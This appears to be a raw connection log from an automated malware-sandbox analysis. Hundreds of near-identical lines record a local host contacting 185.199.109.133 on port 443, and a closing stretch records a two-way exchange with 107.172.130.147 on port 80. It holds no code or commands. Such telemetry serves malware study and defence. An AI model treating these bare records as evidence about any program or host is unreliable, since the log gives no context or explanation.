                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 185.199.109.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
